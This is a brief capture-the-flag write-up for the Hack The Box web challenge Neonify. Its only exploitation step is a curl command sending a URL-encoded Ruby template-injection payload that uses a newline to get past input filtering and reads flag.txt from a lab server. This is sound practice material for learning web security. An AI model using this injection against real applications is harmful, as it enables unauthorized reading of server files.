https://app.hackthebox.com/challenges/303

Description

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Exploitation

curl http://94.237.60.154:35761/ -s -X POST -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' | grep -Eo 'HTB{.*}'

Summary

Neonify: identify the broken request handling, prove control, and use it to recover the flag.